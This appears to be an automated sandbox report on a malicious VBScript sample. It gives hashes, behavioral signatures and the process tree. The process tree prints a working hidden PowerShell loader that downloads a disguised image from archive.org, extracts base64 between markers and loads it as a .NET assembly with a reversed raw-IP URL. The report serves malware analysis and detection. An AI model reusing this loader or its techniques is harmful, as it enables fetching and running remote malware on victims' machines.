Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
10-09-2024 09:12
Static task
static1
Behavioral task
behavioral1
Sample
niceworkeverseenonmybrandnewthings.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
niceworkeverseenonmybrandnewthings.vbs
Resource
win10v2004-20240802-en
General
-
Target
niceworkeverseenonmybrandnewthings.vbs
-
Size
190KB
-
MD5
28c97dfde19efa88d6c84a0e7286154b
-
SHA1
3fe7be956df064cacdbecca32d73c05ca0d700d0
-
SHA256
639983f2307c5ca4de91dd8128e4b68cc492206eb9cd86064bde0cbd2124e375
-
SHA512
d0b7db1d451de64143e2b90b1614d628c2aca1e5739c1ff8f0c91a2cf33258d9be7068b08793fae57d84b0e16fbcb23107eea428eebe94037f91b6cf43c10b24
-
SSDEEP
3072:hb2nhXR7q3BWE12iLRXNEZC+eJxDXXCUgt5pQ9xgGwRzPC86zQRQ6QbQVQbQ0QWO:hbutgrAiLRaI+o2IZKUs3b2V+f4G
Malware Config
Extracted
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
flow | pid | Process
5 | 1824 | powershell.exe
6 | 1824 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid | Process
2884 | powershell.exe
1824 | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
2884 | powershell.exe
1824 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2884 | powershell.exe
Token: SeDebugPrivilege | 1824 | powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description | pid | Process | procid_target
PID 2160 wrote to memory of 2884 | 2160 | WScript.exe | 31
PID 2160 wrote to memory of 2884 | 2160 | WScript.exe | 31
PID 2160 wrote to memory of 2884 | 2160 | WScript.exe | 31
PID 2884 wrote to memory of 1824 | 2884 | powershell.exe | 33
PID 2884 wrote to memory of 1824 | 2884 | powershell.exe | 33
PID 2884 wrote to memory of 1824 | 2884 | powershell.exe | 33
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\niceworkeverseenonmybrandnewthings.vbs"
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⽃ ⇯ ⿉ ⭋ ⌼','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OHTUA/551/271.732.82.941//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 1f5b7cc32eddb49516d9be5520404893
SHA1 76ebd317f9ec76f9781de04bb27c3da9b3714c8a
SHA256 a8d98e6f58676c005785aebdc8e9255933c16a6d23fc2b7ff366709c3a89fb98
SHA512 41f26b9a900de948700fe5c0dfbeae26e4a290083c9ded9902c432b9e2d8d7cafeec61cb64123e2df91dd0b78fb2ee55904d04fe9a5df424cc2ea1abd63e5881